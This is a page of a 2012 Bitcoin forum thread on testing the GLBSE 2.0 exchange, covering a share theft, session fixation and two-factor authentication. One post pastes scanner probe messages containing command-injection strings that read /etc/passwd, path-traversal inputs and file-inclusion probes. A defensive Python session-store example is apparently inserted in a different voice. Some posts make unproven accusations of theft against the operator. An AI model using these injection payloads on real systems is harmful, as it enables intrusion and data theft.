Topic: GLBSE 2.0 open for testing - page 3. (Read 51751 times)

sr. member
Activity: 476
Merit: 250
Keep it Simple. Every Bit Matters.
September 14, 2012, 04:55:01 AM
Nefario, I did a quick search, but couldn't find this being suggested before, at least since you introduced the idea of the different markets, pink, blue and white (good idea btw). Gathered this should be a value of trust in these bonds.

Can we add another to the list that fills the criteria for ones that are winding down their operations or are in fact dead or inactive?

For example, we have a lot of bonds that are directly linked to pirate investments (PPT). Contracts are broken, dividends aren't being paid out, buybacks can't or aren't occurring. It's an asset which shouldn't be traded by anyone, and that should be made quite clear with a separate group for them.
hero member
Activity: 602
Merit: 513
GLBSE Support [email protected]
September 04, 2012, 03:20:20 PM
He was visiting his wife's family in China. I'm not sure when he's going back home. I believe within the next 2 weeks.

I'm in London now, I've had a look at the attempted "hack", quite funny if it wasn't annoying to users. I hadn't considered putting limits on the number of PMs someone can send.

I'll also clean up the spam.
hero member
Activity: 745
Merit: 501
September 01, 2012, 04:35:19 PM
He was visiting his wife's family in China. I'm not sure when he's going back home. I believe within the next 2 weeks.
legendary
Activity: 1162
Merit: 1000
DiabloMiner author
September 01, 2012, 03:16:28 PM
Nefario seems to be very busy in real life and is out of his country, so he might not be heard from for a few days.
sr. member
Activity: 389
Merit: 250
August 31, 2012, 11:11:32 PM
I would be very disappointed if that crap worked on GLBSE, I'm glad to see no one posted anything but annoyance at the spam. (Also, maybe there's a use for a "Report spam" Button?)

There are definitely things that can be done to improve security, but as with any patch Nefario has to be careful to make sure any patch he applies doesn't introduce a security vulnerability, even if it's a security patch. During/after that he has to make sure that the site remains functional; a patch that helps keep other people from hijacking your session may make it harder for you to use your session, which would certainly annoy a great many users.

I'm sure he's hard at work on something, though I can't say for sure what (It may still be features other than security enhancements, there are plenty of people yelling for those too)
legendary
Activity: 1162
Merit: 1000
DiabloMiner author
August 31, 2012, 10:07:48 PM
hero member
Activity: 745
Merit: 501
August 31, 2012, 06:43:59 PM
Looks like someone is trying to hack GLBSE by using the mailing form =/

Don't think it will work tho.
legendary
Activity: 1199
Merit: 1012
August 31, 2012, 05:32:29 PM
I received strange letters at my GLBSE mailbox:

asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:24 Fri-31/Aug   '"()
asdzxc   arsenische    18:24 Fri-31/Aug   {"$acunetix"=>"1"}
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:23 Fri-31/Aug   http://testasp.vulnweb.com/t/fit.txt?%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   1some_inexistent_file_with_long_name%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   ${100036+99616}
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
...
asdzxc   arsenische    19:03 Fri-31/Aug   "|dir
asdzxc   arsenische    19:03 Fri-31/Aug   '&dir&'
asdzxc   arsenische    19:03 Fri-31/Aug   '|dir
asdzxc   arsenische    19:03 Fri-31/Aug   |dir
asdzxc   arsenische    19:03 Fri-31/Aug   "&dir&"
asdzxc   arsenische    19:03 Fri-31/Aug   ";cat /etc/passwd;"
asdzxc   arsenische    19:03 Fri-31/Aug   &dir
asdzxc   arsenische    19:03 Fri-31/Aug   ||cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   ';cat /etc/passwd;'
asdzxc   arsenische    19:03 Fri-31/Aug   |cat /etc/passwd#
asdzxc   arsenische    19:03 Fri-31/Aug   "|"ld
asdzxc   arsenische    19:03 Fri-31/Aug   '|'ld
asdzxc   arsenische    19:03 Fri-31/Aug   `cat /etc/passwd`
asdzxc   arsenische    19:03 Fri-31/Aug   ;cat /etc/passwd;
asdzxc   arsenische    19:03 Fri-31/Aug    cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   &cat /etc/passwd&
asdzxc   arsenische    19:03 Fri-31/Aug   '&cat /etc/passwd&'
asdzxc   arsenische    19:03 Fri-31/Aug   "&cat /etc/passwd&"
asdzxc   arsenische    19:02 Fri-31/Aug   /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
asdzxc   arsenische    19:02 Fri-31/Aug   ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


-- is everything ok?
donator
Activity: 980
Merit: 1000
August 30, 2012, 05:31:07 PM
Are graphs not working?
hero member
Activity: 745
Merit: 501
August 30, 2012, 04:10:15 PM
2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.
This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

True, you can use it on a computer too, but it SHOULD be an external computer, not the computer you use to log in, which also requires an external device such as an extra computer or smartphone. Otherwise someone with a compromised computer can still get your account stolen easily. The 2 factor auth needs to be on another device to effectively block infected/keylogged computers from stealing an account. There are no instructions as to how to use it, but there ARE links to the Google Authenticator app along with the name written in big at the top of the page. You can simply click one of those links or go read about it. There are more than enough instructions on Google's website about it.

And yes, I'm not saying it couldn't be negligence. I'm saying that people started using a service which was NOT finished and Nefario still doesn't claim it to be a finished product, although he's been working quickly since 1.0 when he noticed someone had created an asset for real use. The product never got out of Beta however. However it does seem secure so far.

If you weren't doing anything other than using GLBSE and IRC, and never clicked any link in IRC, my best guess would be that someone had your login info or a compromised account.

If it was a session hijack, then GLBSE's security could be improved to deter this.

The easiest attack would probably be if GLBSE accepts the session ID to be set externally and you click a shortened URL which brings you to a page with a redirect script. The redirect brings you to an actual legit page. The page containing the redirect first records an ID and opens GLBSE in a frame, setting the session ID to said ID. Everyone that clicked on the link sees a legit page loading but now has a new session identifier set for GLBSE. The attacker can now try accessing GLBSE with each generated ID and, if it is associated with someone already logged in to GLBSE, he can get access to the account. Although I'd be very surprised if GLBSE accepts the session ID to be set/changed through a link, it would be a major security risk. Many things could be done to prevent session based attacks if not already done.

Does anybody have a quick link to info on the 2FA?


http://support.google.com/a/bin/answer.py?hl=en&answer=1037451
hero member
Activity: 518
Merit: 500
August 30, 2012, 03:50:04 PM

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.



This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

Does anybody have a quick link to info on the 2FA?
sr. member
Activity: 252
Merit: 250
Inactive
August 30, 2012, 03:44:11 PM

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.



This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.
hero member
Activity: 745
Merit: 501
August 30, 2012, 03:39:03 PM
sr. member
Activity: 392
Merit: 250
August 30, 2012, 03:16:45 PM
I've been thinking it would be a great security feature if you put a 24 hour delay on the creation of assets. That or something similar to protect assets if there is a hacked account.
sr. member
Activity: 252
Merit: 250
Inactive
August 30, 2012, 02:27:20 PM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.
Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate?



Ok.

I am the victim of the ASICMINER theft.  My nature is not to sling sh*t around - particularly when a hacker gets in and no one can definitively point out the method used for the hack.

Also, GLBSE is a great enabler of Bitcoin denominated economic activity.  Props to Nefario for that.

I am only responding on this topic because I see that someone feels just like I do.  Someone takes a loss of thousands of dollars and no one cares to do anything about it if it would only cost ~30 BTC to revert.

With that said I'm super pissed.  Yes, I'm super pissed at GLBSE.  I am also pissed at myself for not doing the right thing and taking pro-active measures to prevent account compromise by enabling 2FA for both login, transfers and withdrawals.  You are not protected from session attacks if you don't enable 2FA for every single GLBSE activity.  Do it.

Since the compromise of my GLBSE account I have set up all sorts of IP logging activity just to review and verify that I'm not on a botnet or compromised by a trojan of any sort.
My system is quiet.  Nothing unusual.

3000 shares of ASICMINER asset were transferred to me on 8/23.  An hour later I logged in to web freenode #bitcoin-otc.  I cannot say for certain whether I manually killed my GLBSE session.  I do know that no browser window was open to GLBSE.  I remained logged in to #bitcoin-otc for a few hours.  Later in the evening people were posting of a dump of ASICMINER asset.  I logged in to my GLBSE account to find the asset liquidated for ~1% of its value.

Absolutely nothing occurred on that day out of the ordinary other than visiting freenode.  I have relatively few apps on the system and less running at any one time.  I am not a security expert, but I take precautions and I've never been infected in any obvious way or by report of antivirus or by any insane amount of TCP activity.

So, what I had suspected and with Nefario also pointing out the same possibility is that I was a victim of Session Fixation.  Someone hijacked my GLBSE session.

Nefario's position on this is that attacks of this nature, Session Fixation, are not the responsibility of GLBSE, but admitting at the same time that additional security precautions could be taken on the GLBSE web application side that could make it more difficult to accomplish session related attacks.

At this point I did two things.  Looked up Web security whitepapers.  Found one stating "Session Fixation, ultimately, can only effectively be countered by the Web application (which would include the client side scripting) in how it controls session generation and invalidation."  Ok, fine.  At this point I'm thinking: if I close my browser window, what happens to my GLBSE session?  If my session was hijacked that would have been the obvious way to get in.  Opened up my Chrome console and looked at the session IDs.  Session IDs persisted across browser windows with a 48 hour browser side expiration period.  Of course, there could be a shorter session expiration period on the web app side.

Edit:
A few thoughts occurred to me.

Why isn't Javascript used to invalidate sessions when the DOM for the page is destroyed?
Why aren't sessions invalidated on a client side timer, as most banking sites do?
Why isn't 2FA a requirement for every single GLBSE activity?

I think you can see the premise of my questions.  I do believe GLBSE is partially responsible for my loss.

I'm angry because it's entirely too easy to commit fraud and get away with it in a system of Bitcoin and GLBSE that allows or enforces anonymity and instantaneous transfers.  
The feeling I got from the incident is one of "use at your own risk."  





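As an added example (not GLBSE's code, whose implementation is not shown in this thread), a minimal Python session store that closes the gaps raised in this post and in the fixation scenario described earlier: it never adopts a session ID it did not issue itself, rotates the ID at login, expires idle sessions on the server rather than relying on the cookie's 48 hour lifetime, and drops the session on logout. The timeout value, class and method names are assumptions made for the example.

```python
from __future__ import annotations

import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple

# Assumed server-side idle limit; a browser-side cookie expiry alone leaves the
# server-side session alive for a hijacker, so the server must enforce its own.
IDLE_TIMEOUT_SECONDS = 15 * 60


@dataclass
class Session:
    user: Optional[str]   # None until the user authenticates
    last_seen: float      # server clock at last request


class SessionStore:
    """Server-side sessions hardened against fixation: only IDs minted here are honoured."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    def _new_id(self) -> str:
        # 256 bits from the OS CSPRNG; never derived from anything the client sent.
        return secrets.token_urlsafe(32)

    def resolve(self, presented_id: Optional[str]) -> Tuple[str, Session]:
        """Map the cookie value to a session. An unknown or expired ID is discarded and a
        fresh anonymous session is issued, so a planted ID can never become a live one."""
        now = self._clock()
        sess = self._sessions.get(presented_id) if presented_id else None
        if sess is not None and now - sess.last_seen > IDLE_TIMEOUT_SECONDS:
            del self._sessions[presented_id]   # server-side idle expiry
            sess = None
        if sess is None:
            presented_id = self._new_id()
            sess = Session(user=None, last_seen=now)
            self._sessions[presented_id] = sess
        sess.last_seen = now
        return presented_id, sess

    def login(self, presented_id: Optional[str], user: str) -> str:
        """Authenticate and rotate: whatever ID the browser held before login is retired."""
        old_id, _ = self.resolve(presented_id)
        self._sessions.pop(old_id, None)
        new_id = self._new_id()
        self._sessions[new_id] = Session(user=user, last_seen=self._clock())
        return new_id

    def logout(self, presented_id: str) -> None:
        self._sessions.pop(presented_id, None)   # invalidate server-side, not just the cookie

    def current_user(self, presented_id: Optional[str]) -> Optional[str]:
        _, sess = self.resolve(presented_id)
        return sess.user
```

Because `resolve` re-issues the ID whenever it sees one it did not mint, a redirect page that plants an identifier in the victim's browser gains nothing: the planted value is never associated with a server-side session, and the ID changes again at login.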
sr. member
Activity: 462
Merit: 250
August 30, 2012, 01:18:33 PM
That's the spirit!

...
I will suggest at the end that maybe it was a bug that Nefario should investigate?


Bugs should be investigated.
legendary
Activity: 2053
Merit: 1356
aka tonikt
August 30, 2012, 01:12:08 PM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.
Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate?
sr. member
Activity: 294
Merit: 250
Bitcoin today is what the internet was in 1998.
August 30, 2012, 01:06:39 PM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.
sr. member
Activity: 266
Merit: 250
The king and the pawn go in the same box @ endgame
August 30, 2012, 07:59:43 AM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew
hero member
Activity: 602
Merit: 513
GLBSE Support [email protected]
August 30, 2012, 07:54:02 AM
Hearing this from you, Nefario, amuses me to no end; you're normally extremely well-spoken.

Sorry, I'm just getting really tired of people attacking me or GLBSE, they don't have anything to actually criticize so they make stuff up and throw all kinds of baseless accusations.

There is piotr_n as you see but also MPOE-PR (Mircea Popescu of Romania's sock puppet), who lately has been saying that I'm being sued as part of the Bitcoinica lawsuit (says I'm one of the unnamed Does), the guy is making up all kinds of stuff, and attacking me when I'm on IRC.